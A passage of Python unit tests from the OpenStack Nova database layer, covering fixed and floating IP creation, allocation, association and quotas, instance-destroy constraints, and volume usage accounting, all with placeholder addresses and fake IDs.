{'reserved': False, 'deleted': 0, 'leased': False,
'host': '127.0.0.1', 'address': address_1, 'allocated': False,
'instance_uuid': instance_uuid, 'network_id': network_id_1,
'virtual_interface_id': None},
{'reserved': False, 'deleted': 0, 'leased': False,
'host': 'localhost', 'address': address_2, 'allocated': True,
'instance_uuid': instance_uuid, 'network_id': network_id_2,
'virtual_interface_id': None},
]
self.assertRaises(exception.FixedIpExists, db.fixed_ip_bulk_create,
self.ctxt, params)
# In this case the transaction will be rolled back and none of the ips
# will make it to the database.
self.assertRaises(exception.FixedIpNotFoundForAddress,
db.fixed_ip_get_by_address, self.ctxt, address_1)
self.assertRaises(exception.FixedIpNotFoundForAddress,
db.fixed_ip_get_by_address, self.ctxt, address_2)
def test_fixed_ip_bulk_create_success(self):
address_1 = '192.168.1.5'
address_2 = '192.168.1.6'
instance_uuid = self._create_instance()
network_id_1 = db.network_create_safe(self.ctxt, {})['id']
network_id_2 = db.network_create_safe(self.ctxt, {})['id']
params = [
{'reserved': False, 'deleted': 0, 'leased': False,
'host': '127.0.0.1', 'address': address_1, 'allocated': False,
'instance_uuid': instance_uuid, 'network_id': network_id_1,
'virtual_interface_id': None},
{'reserved': False, 'deleted': 0, 'leased': False,
'host': 'localhost', 'address': address_2, 'allocated': True,
'instance_uuid': instance_uuid, 'network_id': network_id_2,
'virtual_interface_id': None}
]
db.fixed_ip_bulk_create(self.ctxt, params)
ignored_keys = ['created_at', 'id', 'deleted_at', 'updated_at',
'virtual_interface', 'network', 'floating_ips']
fixed_ip_data = db.fixed_ip_get_by_instance(self.ctxt, instance_uuid)
# we have no `id` in incoming data so we can not use
# _assertEqualListsOfObjects to compare incoming data and received
# objects
fixed_ip_data = sorted(fixed_ip_data, key=lambda i: i['network_id'])
params = sorted(params, key=lambda i: i['network_id'])
for param, ip in zip(params, fixed_ip_data):
self._assertEqualObjects(param, ip, ignored_keys)
def test_fixed_ip_disassociate(self):
address = '192.168.1.5'
instance_uuid = self._create_instance()
network_id = db.network_create_safe(self.ctxt, {})['id']
values = {'address': '192.168.1.5', 'instance_uuid': instance_uuid}
vif = db.virtual_interface_create(self.ctxt, values)
param = {
'reserved': False,
'deleted': 0,
'leased': False,
'host': '127.0.0.1',
'address': address,
'allocated': False,
'instance_uuid': instance_uuid,
'network_id': network_id,
'virtual_interface_id': vif['id']
}
db.fixed_ip_create(self.ctxt, param)
db.fixed_ip_disassociate(self.ctxt, address)
fixed_ip_data = db.fixed_ip_get_by_address(self.ctxt, address)
ignored_keys = ['created_at', 'id', 'deleted_at',
'updated_at', 'instance_uuid',
'virtual_interface_id']
self._assertEqualObjects(param, fixed_ip_data, ignored_keys)
self.assertIsNone(fixed_ip_data['instance_uuid'])
self.assertIsNone(fixed_ip_data['virtual_interface_id'])
def test_fixed_ip_get_not_found_exception(self):
self.assertRaises(exception.FixedIpNotFound,
db.fixed_ip_get, self.ctxt, 0)
def test_fixed_ip_get_success2(self):
address = '192.168.1.5'
instance_uuid = self._create_instance()
network_id = db.network_create_safe(self.ctxt, {})['id']
param = {
'reserved': False,
'deleted': 0,
'leased': False,
'host': '127.0.0.1',
'address': address,
'allocated': False,
'instance_uuid': instance_uuid,
'network_id': network_id,
'virtual_interface_id': None
}
fixed_ip_id = db.fixed_ip_create(self.ctxt, param)
self.ctxt.is_admin = False
self.assertRaises(exception.Forbidden, db.fixed_ip_get,
self.ctxt, fixed_ip_id)
def test_fixed_ip_get_success(self):
address = '192.168.1.5'
instance_uuid = self._create_instance()
network_id = db.network_create_safe(self.ctxt, {})['id']
param = {
'reserved': False,
'deleted': 0,
'leased': False,
'host': '127.0.0.1',
'address': address,
'allocated': False,
'instance_uuid': instance_uuid,
'network_id': network_id,
'virtual_interface_id': None
}
db.fixed_ip_create(self.ctxt, param)
fixed_ip_id = db.fixed_ip_get_by_address(self.ctxt, address)['id']
fixed_ip_data = db.fixed_ip_get(self.ctxt, fixed_ip_id)
ignored_keys = ['created_at', 'id', 'deleted_at', 'updated_at']
self._assertEqualObjects(param, fixed_ip_data, ignored_keys)
def test_fixed_ip_get_by_address(self):
instance_uuid = self._create_instance()
db.fixed_ip_create(self.ctxt, {'address': '1.2.3.4',
'instance_uuid': instance_uuid,
})
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, '1.2.3.4',
columns_to_join=['instance'])
self.assertIn('instance', fixed_ip.__dict__)
self.assertEqual(instance_uuid, fixed_ip.instance.uuid)
def test_fixed_ip_update_not_found_for_address(self):
self.assertRaises(exception.FixedIpNotFoundForAddress,
db.fixed_ip_update, self.ctxt,
'192.168.1.5', {})
def test_fixed_ip_update(self):
instance_uuid_1 = self._create_instance()
instance_uuid_2 = self._create_instance()
network_id_1 = db.network_create_safe(self.ctxt, {})['id']
network_id_2 = db.network_create_safe(self.ctxt, {})['id']
param_1 = {
'reserved': True, 'deleted': 0, 'leased': True,
'host': '192.168.133.1', 'address': '10.0.0.2',
'allocated': True, 'instance_uuid': instance_uuid_1,
'network_id': network_id_1, 'virtual_interface_id': '123',
}
param_2 = {
'reserved': False, 'deleted': 0, 'leased': False,
'host': '127.0.0.1', 'address': '10.0.0.3', 'allocated': False,
'instance_uuid': instance_uuid_2, 'network_id': network_id_2,
'virtual_interface_id': None
}
ignored_keys = ['created_at', 'id', 'deleted_at', 'updated_at']
fixed_ip_addr = db.fixed_ip_create(self.ctxt, param_1)['address']
db.fixed_ip_update(self.ctxt, fixed_ip_addr, param_2)
fixed_ip_after_update = db.fixed_ip_get_by_address(self.ctxt,
param_2['address'])
self._assertEqualObjects(param_2, fixed_ip_after_update, ignored_keys)
class FloatingIpTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(FloatingIpTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_base_values(self):
return {
'address': '1.1.1.1',
'fixed_ip_id': None,
'project_id': 'fake_project',
'host': 'fake_host',
'auto_assigned': False,
'pool': 'fake_pool',
'interface': 'fake_interface',
}
def mock_db_query_first_to_raise_data_error_exception(self):
self.mox.StubOutWithMock(query.Query, 'first')
query.Query.first().AndRaise(db_exc.DBError())
self.mox.ReplayAll()
def _create_floating_ip(self, values):
if not values:
values = {}
vals = self._get_base_values()
vals.update(values)
return db.floating_ip_create(self.ctxt, vals)
def test_floating_ip_get(self):
values = [{'address': '0.0.0.0'}, {'address': '1.1.1.1'}]
floating_ips = [self._create_floating_ip(val) for val in values]
for floating_ip in floating_ips:
real_floating_ip = db.floating_ip_get(self.ctxt, floating_ip['id'])
self._assertEqualObjects(floating_ip, real_floating_ip,
ignored_keys=['fixed_ip'])
def test_floating_ip_get_not_found(self):
self.assertRaises(exception.FloatingIpNotFound,
db.floating_ip_get, self.ctxt, 100500)
def test_floating_ip_get_with_long_id_not_found(self):
self.mock_db_query_first_to_raise_data_error_exception()
self.assertRaises(exception.InvalidID,
db.floating_ip_get, self.ctxt, 123456789101112)
def test_floating_ip_get_pools(self):
values = [
{'address': '0.0.0.0', 'pool': 'abc'},
{'address': '1.1.1.1', 'pool': 'abc'},
{'address': '2.2.2.2', 'pool': 'def'},
{'address': '3.3.3.3', 'pool': 'ghi'},
]
for val in values:
self._create_floating_ip(val)
expected_pools = [{'name': x}
for x in set(map(lambda x: x['pool'], values))]
real_pools = db.floating_ip_get_pools(self.ctxt)
self._assertEqualListsOfPrimitivesAsSets(real_pools, expected_pools)
def test_floating_ip_allocate_address(self):
pools = {
'pool1': ['0.0.0.0', '1.1.1.1'],
'pool2': ['2.2.2.2'],
'pool3': ['3.3.3.3', '4.4.4.4', '5.5.5.5']
}
for pool, addresses in pools.items():
for address in addresses:
vals = {'pool': pool, 'address': address, 'project_id': None}
self._create_floating_ip(vals)
project_id = self._get_base_values()['project_id']
for pool, addresses in pools.items():
alloc_addrs = []
for i in addresses:
float_addr = db.floating_ip_allocate_address(self.ctxt,
project_id, pool)
alloc_addrs.append(float_addr)
self._assertEqualListsOfPrimitivesAsSets(alloc_addrs, addresses)
def test_floating_ip_allocate_auto_assigned(self):
addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3', '1.1.1.4']
float_ips = []
for i in range(0, 2):
float_ips.append(self._create_floating_ip(
{"address": addresses[i]}))
for i in range(2, 4):
float_ips.append(self._create_floating_ip({"address": addresses[i],
"auto_assigned": True}))
for i in range(0, 2):
float_ip = db.floating_ip_get(self.ctxt, float_ips[i].id)
self.assertFalse(float_ip.auto_assigned)
for i in range(2, 4):
float_ip = db.floating_ip_get(self.ctxt, float_ips[i].id)
self.assertTrue(float_ip.auto_assigned)
def test_floating_ip_allocate_address_no_more_floating_ips(self):
self.assertRaises(exception.NoMoreFloatingIps,
db.floating_ip_allocate_address,
self.ctxt, 'any_project_id', 'no_such_pool')
def test_floating_ip_allocate_not_authorized(self):
ctxt = context.RequestContext(user_id='a', project_id='abc',
is_admin=False)
self.assertRaises(exception.Forbidden,
db.floating_ip_allocate_address,
ctxt, 'other_project_id', 'any_pool')
def test_floating_ip_allocate_address_succeeds_retry(self):
pool = 'pool0'
address = '0.0.0.0'
vals = {'pool': pool, 'address': address, 'project_id': None}
floating_ip = self._create_floating_ip(vals)
project_id = self._get_base_values()['project_id']
def fake_first():
if mock_first.call_count == 1:
return {'pool': pool, 'project_id': None, 'fixed_ip_id': None,
'address': address, 'id': 'invalid_id'}
else:
return {'pool': pool, 'project_id': None, 'fixed_ip_id': None,
'address': address, 'id': 1}
with mock.patch('sqlalchemy.orm.query.Query.first',
side_effect=fake_first) as mock_first:
float_addr = db.floating_ip_allocate_address(self.ctxt,
project_id, pool)
self.assertEqual(address, float_addr)
self.assertEqual(2, mock_first.call_count)
float_ip = db.floating_ip_get(self.ctxt, floating_ip.id)
self.assertEqual(project_id, float_ip['project_id'])
def test_floating_ip_allocate_address_retry_limit_exceeded(self):
pool = 'pool0'
address = '0.0.0.0'
vals = {'pool': pool, 'address': address, 'project_id': None}
self._create_floating_ip(vals)
project_id = self._get_base_values()['project_id']
def fake_first():
return {'pool': pool, 'project_id': None, 'fixed_ip_id': None,
'address': address, 'id': 'invalid_id'}
with mock.patch('sqlalchemy.orm.query.Query.first',
side_effect=fake_first) as mock_first:
self.assertRaises(exception.FloatingIpAllocateFailed,
db.floating_ip_allocate_address, self.ctxt,
project_id, pool)
# 5 retries + initial attempt
self.assertEqual(6, mock_first.call_count)
def test_floating_ip_allocate_address_no_more_ips_with_no_retries(self):
with mock.patch('sqlalchemy.orm.query.Query.first',
return_value=None) as mock_first:
self.assertRaises(exception.NoMoreFloatingIps,
db.floating_ip_allocate_address,
self.ctxt, 'any_project_id', 'no_such_pool')
self.assertEqual(1, mock_first.call_count)
def _get_existing_ips(self):
return [ip['address'] for ip in db.floating_ip_get_all(self.ctxt)]
def test_floating_ip_bulk_create(self):
expected_ips = ['1.1.1.1', '1.1.1.2', '1.1.1.3', '1.1.1.4']
result = db.floating_ip_bulk_create(self.ctxt,
[{'address': x} for x in expected_ips],
want_result=False)
self.assertIsNone(result)
self._assertEqualListsOfPrimitivesAsSets(self._get_existing_ips(),
expected_ips)
def test_floating_ip_bulk_create_duplicate(self):
ips = ['1.1.1.1', '1.1.1.2', '1.1.1.3', '1.1.1.4']
prepare_ips = lambda x: {'address': x}
result = db.floating_ip_bulk_create(self.ctxt,
list(map(prepare_ips, ips)))
self.assertEqual(ips, [ip.address for ip in result])
self.assertRaises(exception.FloatingIpExists,
db.floating_ip_bulk_create,
self.ctxt,
list(map(prepare_ips, ['1.1.1.5', '1.1.1.4'])),
want_result=False)
self.assertRaises(exception.FloatingIpNotFoundForAddress,
db.floating_ip_get_by_address,
self.ctxt, '1.1.1.5')
def test_floating_ip_bulk_destroy(self):
ips_for_delete = []
ips_for_non_delete = []
def create_ips(i, j):
return [{'address': '1.1.%s.%s' % (i, k)} for k in range(1, j + 1)]
# NOTE(boris-42): Create more than 256 ip to check that
# _ip_range_splitter works properly.
for i in range(1, 3):
ips_for_delete.extend(create_ips(i, 255))
ips_for_non_delete.extend(create_ips(3, 255))
result = db.floating_ip_bulk_create(self.ctxt,
ips_for_delete + ips_for_non_delete,
want_result=False)
self.assertIsNone(result)
non_bulk_ips_for_delete = create_ips(4, 3)
non_bulk_ips_for_non_delete = create_ips(5, 3)
non_bulk_ips = non_bulk_ips_for_delete + non_bulk_ips_for_non_delete
project_id = 'fake_project'
reservations = quota.QUOTAS.reserve(self.ctxt,
floating_ips=len(non_bulk_ips),
project_id=project_id)
for dct in non_bulk_ips:
self._create_floating_ip(dct)
quota.QUOTAS.commit(self.ctxt, reservations, project_id=project_id)
self.assertEqual(db.quota_usage_get_all_by_project(
self.ctxt, project_id),
{'project_id': project_id,
'floating_ips': {'in_use': 6, 'reserved': 0}})
ips_for_delete.extend(non_bulk_ips_for_delete)
ips_for_non_delete.extend(non_bulk_ips_for_non_delete)
db.floating_ip_bulk_destroy(self.ctxt, ips_for_delete)
expected_addresses = [x['address'] for x in ips_for_non_delete]
self._assertEqualListsOfPrimitivesAsSets(self._get_existing_ips(),
expected_addresses)
self.assertEqual(db.quota_usage_get_all_by_project(
self.ctxt, project_id),
{'project_id': project_id,
'floating_ips': {'in_use': 3, 'reserved': 0}})
def test_floating_ip_create(self):
floating_ip = self._create_floating_ip({})
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self.assertIsNotNone(floating_ip['id'])
self._assertEqualObjects(floating_ip, self._get_base_values(),
ignored_keys)
def test_floating_ip_create_duplicate(self):
self._create_floating_ip({})
self.assertRaises(exception.FloatingIpExists,
self._create_floating_ip, {})
def _create_fixed_ip(self, params):
default_params = {'address': '192.168.0.1'}
default_params.update(params)
return db.fixed_ip_create(self.ctxt, default_params)['address']
def test_floating_ip_fixed_ip_associate(self):
float_addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
fixed_addresses = ['2.2.2.1', '2.2.2.2', '2.2.2.3']
project_id = self.ctxt.project_id
float_ips = [self._create_floating_ip({'address': address,
'project_id': project_id})
for address in float_addresses]
fixed_addrs = [self._create_fixed_ip({'address': address})
for address in fixed_addresses]
for float_ip, fixed_addr in zip(float_ips, fixed_addrs):
fixed_ip = db.floating_ip_fixed_ip_associate(self.ctxt,
float_ip.address,
fixed_addr, 'host')
self.assertEqual(fixed_ip.address, fixed_addr)
updated_float_ip = db.floating_ip_get(self.ctxt, float_ip.id)
self.assertEqual(fixed_ip.id, updated_float_ip.fixed_ip_id)
self.assertEqual('host', updated_float_ip.host)
fixed_ip = db.floating_ip_fixed_ip_associate(self.ctxt,
float_addresses[0],
fixed_addresses[0],
'host')
self.assertEqual(fixed_ip.address, fixed_addresses[0])
def test_floating_ip_fixed_ip_associate_float_ip_not_found(self):
self.assertRaises(exception.FixedIpNotFoundForAddress,
db.floating_ip_fixed_ip_associate,
self.ctxt, '10.10.10.10', 'some', 'some')
def test_floating_ip_associate_failed(self):
fixed_ip = self._create_fixed_ip({'address': '7.7.7.7'})
self.assertRaises(exception.FloatingIpAssociateFailed,
db.floating_ip_fixed_ip_associate,
self.ctxt, '10.10.10.10', fixed_ip, 'some')
def test_floating_ip_deallocate(self):
values = {'address': '1.1.1.1', 'project_id': 'fake', 'host': 'fake'}
float_ip = self._create_floating_ip(values)
rows_updated = db.floating_ip_deallocate(self.ctxt, float_ip.address)
self.assertEqual(1, rows_updated)
updated_float_ip = db.floating_ip_get(self.ctxt, float_ip.id)
self.assertIsNone(updated_float_ip.project_id)
self.assertIsNone(updated_float_ip.host)
self.assertFalse(updated_float_ip.auto_assigned)
def test_floating_ip_deallocate_address_not_found(self):
self.assertEqual(0, db.floating_ip_deallocate(self.ctxt, '2.2.2.2'))
def test_floating_ip_deallocate_address_associated_ip(self):
float_address = '1.1.1.1'
fixed_address = '2.2.2.1'
project_id = self.ctxt.project_id
float_ip = self._create_floating_ip({'address': float_address,
'project_id': project_id})
fixed_addr = self._create_fixed_ip({'address': fixed_address})
db.floating_ip_fixed_ip_associate(self.ctxt, float_ip.address,
fixed_addr, 'host')
self.assertEqual(0, db.floating_ip_deallocate(self.ctxt,
float_address))
def test_floating_ip_destroy(self):
addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
float_ips = [self._create_floating_ip({'address': addr})
for addr in addresses]
expected_len = len(addresses)
for float_ip in float_ips:
db.floating_ip_destroy(self.ctxt, float_ip.address)
self.assertRaises(exception.FloatingIpNotFound,
db.floating_ip_get, self.ctxt, float_ip.id)
expected_len -= 1
if expected_len > 0:
self.assertEqual(expected_len,
len(db.floating_ip_get_all(self.ctxt)))
else:
self.assertRaises(exception.NoFloatingIpsDefined,
db.floating_ip_get_all, self.ctxt)
def test_floating_ip_disassociate(self):
float_addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
fixed_addresses = ['2.2.2.1', '2.2.2.2', '2.2.2.3']
project_id = self.ctxt.project_id
float_ips = [self._create_floating_ip({'address': address,
'project_id': project_id})
for address in float_addresses]
fixed_addrs = [self._create_fixed_ip({'address': address})
for address in fixed_addresses]
for float_ip, fixed_addr in zip(float_ips, fixed_addrs):
db.floating_ip_fixed_ip_associate(self.ctxt,
float_ip.address,
fixed_addr, 'host')
for float_ip, fixed_addr in zip(float_ips, fixed_addrs):
fixed = db.floating_ip_disassociate(self.ctxt, float_ip.address)
self.assertEqual(fixed.address, fixed_addr)
updated_float_ip = db.floating_ip_get(self.ctxt, float_ip.id)
self.assertIsNone(updated_float_ip.fixed_ip_id)
self.assertIsNone(updated_float_ip.host)
def test_floating_ip_disassociate_not_found(self):
self.assertRaises(exception.FloatingIpNotFoundForAddress,
db.floating_ip_disassociate, self.ctxt,
'11.11.11.11')
def test_floating_ip_get_all(self):
addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
float_ips = [self._create_floating_ip({'address': addr})
for addr in addresses]
self._assertEqualListsOfObjects(float_ips,
db.floating_ip_get_all(self.ctxt),
ignored_keys="fixed_ip")
def test_floating_ip_get_all_associated(self):
instance = db.instance_create(self.ctxt, {'uuid': 'fake'})
project_id = self.ctxt.project_id
float_ip = self._create_floating_ip({'address': '1.1.1.1',
'project_id': project_id})
fixed_ip = self._create_fixed_ip({'address': '2.2.2.2',
'instance_uuid': instance.uuid})
db.floating_ip_fixed_ip_associate(self.ctxt,
float_ip.address,
fixed_ip,
'host')
float_ips = db.floating_ip_get_all(self.ctxt)
self.assertEqual(1, len(float_ips))
self.assertEqual(float_ip.address, float_ips[0].address)
self.assertEqual(fixed_ip, float_ips[0].fixed_ip.address)
self.assertEqual(instance.uuid, float_ips[0].fixed_ip.instance_uuid)
def test_floating_ip_get_all_not_found(self):
self.assertRaises(exception.NoFloatingIpsDefined,
db.floating_ip_get_all, self.ctxt)
def test_floating_ip_get_all_by_host(self):
hosts = {
'host1': ['1.1.1.1', '1.1.1.2'],
'host2': ['2.1.1.1', '2.1.1.2'],
'host3': ['3.1.1.1', '3.1.1.2', '3.1.1.3']
}
hosts_with_float_ips = {}
for host, addresses in hosts.items():
hosts_with_float_ips[host] = []
for address in addresses:
float_ip = self._create_floating_ip({'host': host,
'address': address})
hosts_with_float_ips[host].append(float_ip)
for host, float_ips in hosts_with_float_ips.items():
real_float_ips = db.floating_ip_get_all_by_host(self.ctxt, host)
self._assertEqualListsOfObjects(float_ips, real_float_ips,
ignored_keys="fixed_ip")
def test_floating_ip_get_all_by_host_not_found(self):
self.assertRaises(exception.FloatingIpNotFoundForHost,
db.floating_ip_get_all_by_host,
self.ctxt, 'non_exists_host')
def test_floating_ip_get_all_by_project(self):
projects = {
'pr1': ['1.1.1.1', '1.1.1.2'],
'pr2': ['2.1.1.1', '2.1.1.2'],
'pr3': ['3.1.1.1', '3.1.1.2', '3.1.1.3']
}
projects_with_float_ips = {}
for project_id, addresses in projects.items():
projects_with_float_ips[project_id] = []
for address in addresses:
float_ip = self._create_floating_ip({'project_id': project_id,
'address': address})
projects_with_float_ips[project_id].append(float_ip)
for project_id, float_ips in projects_with_float_ips.items():
real_float_ips = db.floating_ip_get_all_by_project(self.ctxt,
project_id)
self._assertEqualListsOfObjects(float_ips, real_float_ips,
ignored_keys='fixed_ip')
def test_floating_ip_get_all_by_project_not_authorized(self):
ctxt = context.RequestContext(user_id='a', project_id='abc',
is_admin=False)
self.assertRaises(exception.Forbidden,
db.floating_ip_get_all_by_project,
ctxt, 'other_project')
def test_floating_ip_get_by_address(self):
addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
float_ips = [self._create_floating_ip({'address': addr})
for addr in addresses]
for float_ip in float_ips:
real_float_ip = db.floating_ip_get_by_address(self.ctxt,
float_ip.address)
self._assertEqualObjects(float_ip, real_float_ip,
ignored_keys='fixed_ip')
def test_floating_ip_get_by_address_not_found(self):
self.assertRaises(exception.FloatingIpNotFoundForAddress,
db.floating_ip_get_by_address,
self.ctxt, '20.20.20.20')
def test_floating_ip_get_by_invalid_address(self):
self.mock_db_query_first_to_raise_data_error_exception()
self.assertRaises(exception.InvalidIpAddressError,
db.floating_ip_get_by_address,
self.ctxt, 'non_exists_host')
def test_floating_ip_get_by_fixed_address(self):
fixed_float = [
('1.1.1.1', '2.2.2.1'),
('1.1.1.2', '2.2.2.2'),
('1.1.1.3', '2.2.2.3')
]
for fixed_addr, float_addr in fixed_float:
project_id = self.ctxt.project_id
self._create_floating_ip({'address': float_addr,
'project_id': project_id})
self._create_fixed_ip({'address': fixed_addr})
db.floating_ip_fixed_ip_associate(self.ctxt, float_addr,
fixed_addr, 'some_host')
for fixed_addr, float_addr in fixed_float:
float_ip = db.floating_ip_get_by_fixed_address(self.ctxt,
fixed_addr)
self.assertEqual(float_addr, float_ip[0]['address'])
def test_floating_ip_get_by_fixed_ip_id(self):
fixed_float = [
('1.1.1.1', '2.2.2.1'),
('1.1.1.2', '2.2.2.2'),
('1.1.1.3', '2.2.2.3')
]
for fixed_addr, float_addr in fixed_float:
project_id = self.ctxt.project_id
self._create_floating_ip({'address': float_addr,
'project_id': project_id})
self._create_fixed_ip({'address': fixed_addr})
db.floating_ip_fixed_ip_associate(self.ctxt, float_addr,
fixed_addr, 'some_host')
for fixed_addr, float_addr in fixed_float:
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, fixed_addr)
float_ip = db.floating_ip_get_by_fixed_ip_id(self.ctxt,
fixed_ip['id'])
self.assertEqual(float_addr, float_ip[0]['address'])
def test_floating_ip_update(self):
float_ip = self._create_floating_ip({})
values = {
'project_id': 'some_pr',
'host': 'some_host',
'auto_assigned': True,
'interface': 'some_interface',
'pool': 'some_pool'
}
floating_ref = db.floating_ip_update(self.ctxt, float_ip['address'],
values)
self.assertIsNotNone(floating_ref)
updated_float_ip = db.floating_ip_get(self.ctxt, float_ip['id'])
self._assertEqualObjects(updated_float_ip, values,
ignored_keys=['id', 'address', 'updated_at',
'deleted_at', 'created_at',
'deleted', 'fixed_ip_id',
'fixed_ip'])
def test_floating_ip_update_to_duplicate(self):
float_ip1 = self._create_floating_ip({'address': '1.1.1.1'})
float_ip2 = self._create_floating_ip({'address': '1.1.1.2'})
self.assertRaises(exception.FloatingIpExists,
db.floating_ip_update,
self.ctxt, float_ip2['address'],
{'address': float_ip1['address']})
class InstanceDestroyConstraints(test.TestCase):
def test_destroy_with_equal_any_constraint_met_single_value(self):
ctx = context.get_admin_context()
instance = db.instance_create(ctx, {'task_state': 'deleting'})
constraint = db.constraint(task_state=db.equal_any('deleting'))
db.instance_destroy(ctx, instance['uuid'], constraint)
self.assertRaises(exception.InstanceNotFound, db.instance_get_by_uuid,
ctx, instance['uuid'])
def test_destroy_with_equal_any_constraint_met(self):
ctx = context.get_admin_context()
instance = db.instance_create(ctx, {'task_state': 'deleting'})
constraint = db.constraint(task_state=db.equal_any('deleting',
'error'))
db.instance_destroy(ctx, instance['uuid'], constraint)
self.assertRaises(exception.InstanceNotFound, db.instance_get_by_uuid,
ctx, instance['uuid'])
def test_destroy_with_equal_any_constraint_not_met(self):
ctx = context.get_admin_context()
instance = db.instance_create(ctx, {'vm_state': 'resize'})
constraint = db.constraint(vm_state=db.equal_any('active', 'error'))
self.assertRaises(exception.ConstraintNotMet, db.instance_destroy,
ctx, instance['uuid'], constraint)
instance = db.instance_get_by_uuid(ctx, instance['uuid'])
self.assertFalse(instance['deleted'])
def test_destroy_with_not_equal_constraint_met(self):
ctx = context.get_admin_context()
instance = db.instance_create(ctx, {'task_state': 'deleting'})
constraint = db.constraint(task_state=db.not_equal('error', 'resize'))
db.instance_destroy(ctx, instance['uuid'], constraint)
self.assertRaises(exception.InstanceNotFound, db.instance_get_by_uuid,
ctx, instance['uuid'])
def test_destroy_with_not_equal_constraint_not_met(self):
ctx = context.get_admin_context()
instance = db.instance_create(ctx, {'vm_state': 'active'})
constraint = db.constraint(vm_state=db.not_equal('active', 'error'))
self.assertRaises(exception.ConstraintNotMet, db.instance_destroy,
ctx, instance['uuid'], constraint)
instance = db.instance_get_by_uuid(ctx, instance['uuid'])
self.assertFalse(instance['deleted'])
class VolumeUsageDBApiTestCase(test.TestCase):
def setUp(self):
super(VolumeUsageDBApiTestCase, self).setUp()
self.user_id = 'fake'
self.project_id = 'fake'
self.context = context.RequestContext(self.user_id, self.project_id)
self.useFixture(test.TimeOverride())
def test_vol_usage_update_no_totals_update(self):
ctxt = context.get_admin_context()
now = timeutils.utcnow()
timeutils.set_time_override(now)
start_time = now - datetime.timedelta(seconds=10)
expected_vol_usages = {
u'1': {'volume_id': u'1',
'instance_uuid': 'fake-instance-uuid1',
'project_id': 'fake-project-uuid1',
'user_id': 'fake-user-uuid1',
'curr_reads': 1000,
'curr_read_bytes': 2000,
'curr_writes': 3000,
'curr_write_bytes': 4000,
'curr_last_refreshed': now,
'tot_reads': 0,
'tot_read_bytes': 0,
'tot_writes': 0,
'tot_write_bytes': 0,
'tot_last_refreshed': None},
u'2': {'volume_id': u'2',
'instance_uuid': 'fake-instance-uuid2',
'project_id': 'fake-project-uuid2',
'user_id': 'fake-user-uuid2',
'curr_reads': 100,
'curr_read_bytes': 200,
'curr_writes': 300,
'curr_write_bytes': 400,
'tot_reads': 0,
'tot_read_bytes': 0,
'tot_writes': 0,
'tot_write_bytes': 0,
'tot_last_refreshed': None}
}
def _compare(vol_usage, expected):
for key, value in expected.items():
self.assertEqual(vol_usage[key], value)
vol_usages = db.vol_get_usage_by_time(ctxt, start_time)
self.assertEqual(len(vol_usages), 0)
db.vol_usage_update(ctxt, u'1', rd_req=10, rd_bytes=20,
wr_req=30, wr_bytes=40,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
user_id='fake-user-uuid1',
availability_zone='fake-az')
db.vol_usage_update(ctxt, u'2', rd_req=100, rd_bytes=200,
wr_req=300, wr_bytes=400,
instance_id='fake-instance-uuid2',
project_id='fake-project-uuid2',
user_id='fake-user-uuid2',
availability_zone='fake-az')
db.vol_usage_update(ctxt, u'1', rd_req=1000, rd_bytes=2000,
wr_req=3000, wr_bytes=4000,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
user_id='fake-user-uuid1',
availability_zone='fake-az')
vol_usages = db.vol_get_usage_by_time(ctxt, start_time)
self.assertEqual(len(vol_usages), 2)
for usage in vol_usages:
_compare(usage, expected_vol_usages[usage.volume_id])
def test_vol_usage_update_totals_update(self):
ctxt = context.get_admin_context()
now = datetime.datetime(1, 1, 1, 1, 0, 0)
start_time = now - datetime.timedelta(seconds=10)
now1 = now + datetime.timedelta(minutes=1)
now2 = now + datetime.timedelta(minutes=2)
now3 = now + datetime.timedelta(minutes=3)
timeutils.set_time_override(now)
db.vol_usage_update(ctxt, u'1', rd_req=100, rd_bytes=200,
wr_req=300, wr_bytes=400,
instance_id='fake-instance-uuid',
project_id='fake-project-uuid',
user_id='fake-user-uuid',
availability_zone='fake-az')
current_usage = db.vol_get_usage_by_time(ctxt, start_time)[0]
self.assertEqual(current_usage['tot_reads'], 0)
self.assertEqual(current_usage['curr_reads'], 100)
timeutils.set_time_override(now1)
db.vol_usage_update(ctxt, u'1', rd_req=200, rd_bytes=300,
wr_req=400, wr_bytes=500,
instance_id='fake-instance-uuid',
project_id='fake-project-uuid',
user_id='fake-user-uuid',
availability_zone='fake-az',
update_totals=True)
current_usage = db.vol_get_usage_by_time(ctxt, start_time)[0]
self.assertEqual(current_usage['tot_reads'], 200)
self.assertEqual(current_usage['curr_reads'], 0)
timeutils.set_time_override(now2)
db.vol_usage_update(ctxt, u'1', rd_req=300, rd_bytes=400,
wr_req=500, wr_bytes=600,
instance_id='fake-instance-uuid',
project_id='fake-project-uuid',
availability_zone='fake-az',
user_id='fake-user-uuid')
current_usage = db.vol_get_usage_by_time(ctxt, start_time)[0]
self.assertEqual(current_usage['tot_reads'], 200)
self.assertEqual(current_usage['curr_reads'], 300)
timeutils.set_time_override(now3)
db.vol_usage_update(ctxt, u'1', rd_req=400, rd_bytes=500,
wr_req=600, wr_bytes=700,
instance_id='fake-instance-uuid',
project_id='fake-project-uuid',
user_id='fake-user-uuid',
availability_zone='fake-az',
update_totals=True)
vol_usages = db.vol_get_usage_by_time(ctxt, start_time)
expected_vol_usages = {'volume_id': u'1',
'project_id': 'fake-project-uuid',
'user_id': 'fake-user-uuid',
'instance_uuid': 'fake-instance-uuid',
'availability_zone': 'fake-az',
'tot_reads': 600,
'tot_read_bytes': 800,
'tot_writes': 1000,
'tot_write_bytes': 1200,
'tot_last_refreshed': now3,
'curr_reads': 0,
'curr_read_bytes': 0,
'curr_writes': 0,
'curr_write_bytes': 0,
'curr_last_refreshed': now2}
self.assertEqual(1, len(vol_usages))
for key, value in expected_vol_usages.items():
self.assertEqual(vol_usages[0][key], value, key)
def test_vol_usage_update_when_blockdevicestats_reset(self):
ctxt = context.get_admin_context()
now = timeutils.utcnow()
start_time = now - datetime.timedelta(seconds=10)
